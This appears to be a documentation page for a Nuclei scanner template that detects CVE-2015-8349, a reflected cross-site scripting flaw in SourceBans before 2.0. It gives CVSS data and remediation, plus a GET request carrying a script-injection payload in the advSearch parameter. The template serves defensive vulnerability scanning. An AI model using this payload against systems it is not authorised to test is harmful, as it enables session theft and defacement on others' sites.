SourceBans <2.0 - Cross-Site Scripting
ID: CVE-2015-8349
Severity: medium
Author: pikpikcu
Tags: cve2015,cve,xss,sourcebans,gameconnect
Description
Section titled “Description”SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php.
YAML Source
Section titled “YAML Source”id: CVE-2015-8349
info: name: SourceBans <2.0 - Cross-Site Scripting author: pikpikcu severity: medium description: SourceBans before 2.0 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the advSearch parameter to index.php. impact: | Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Upgrade to a version of SourceBans that is 2.0 or above, which includes a fix for this vulnerability. reference: - https://www.htbridge.com/advisory/HTB23273 - https://nvd.nist.gov/vuln/detail/CVE-2015-8349 - https://github.com/ARPSyndicate/kenzer-templates classification: cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2015-8349 cwe-id: CWE-79 epss-score: 0.0013 epss-percentile: 0.46975 cpe: cpe:2.3:a:gameconnect:sourcebans:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: gameconnect product: sourcebans tags: cve2015,cve,xss,sourcebans,gameconnect
http: - method: GET path: - "{{BaseURL}}/index.php?p=banlist&advSearch=0%27%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&advType=btype"
matchers-condition: and matchers: - type: word part: body words: - '</script><script>alert(document.domain)</script>'
- type: word part: header words: - text/
- type: status status: - 200# digest: 4a0a0047304502206cdb9bc90db0a072c523ea86239f6ed51becd7f22cb18737f01ade1c0fcc10bb022100d08dd9f43e4810db1d88e4efc56d13bc303a96b132ff7186a1c6ebe676a15813:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2015/CVE-2015-8349.yaml"